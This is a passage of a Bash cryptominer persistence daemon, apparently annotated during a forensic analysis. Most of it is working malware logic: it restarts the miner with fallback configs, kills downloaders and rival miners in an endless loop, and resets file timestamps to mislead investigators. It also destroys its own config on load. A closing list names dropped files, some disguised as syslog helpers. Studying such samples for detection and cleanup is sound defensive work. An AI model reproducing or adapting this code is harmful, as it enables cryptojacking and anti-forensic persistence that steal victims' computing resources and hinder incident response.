        if [ -n "$(_pgrep_f "$MALWARE_NAME")" ]; then
          echo " [Daemon] ✓ Miner started with fallback config (PID: $(_pgrep_f "$MALWARE_NAME" | head -1))" >&2
          protect_deploy_dir
          return 0
        fi
      fi
    fi
    echo " [Daemon] ERROR: Miner failed to start after all attempts" >&2
    protect_deploy_dir
    return 1
  fi
}

# Endless watchdog loop. Every iteration kills downloaders; every TICK_MOD
# iterations it re-checks the miner and kills rivals; every 720 of those
# maintenance rounds it `touch`es its own files, resetting their
# modification times. Timeline note: mtimes on these files therefore
# reflect the last touch, not the time of the original drop.
# Remediation note: because the loop re-downloads and restarts the miner,
# killing only the miner process is not sufficient; this daemon has to be
# stopped as well.
main_loop() {
  sleep 5
  local tick=0
  local touch_tick=0
  while true; do
    kill_downloaders
    tick=$((tick + 1))
    if [ $((tick % TICK_MOD)) -eq 0 ]; then
      ensure_miner_running
      kill_rival_miners
      tick=0
      touch_tick=$((touch_tick + 1))
      if [ $((touch_tick % 720)) -eq 0 ]; then
        touch "${DEPLOY_DIR}/${MALWARE_NAME}" "${DEPLOY_DIR}/config.json" "${DEPLOY_DIR}/.malware.conf" "${DEPLOY_DIR}/${DAEMON_NAME}" "${DEPLOY_DIR}/.daemon.lock" 2>/dev/null
        touch_tick=0
      fi
    fi
    sleep $SLEEP_INTERVAL
  done
}

# Entry sequence: load (and destroy) the config, take the lock, loop.
find_and_read_config
check_and_acquire_lock
main_loop
[-] config.orig.json
[-] syslog-ng-13b1b2b7
[-] config.json
[-] syslog-helper
[-] .malware.conf
[-] .daemon.lock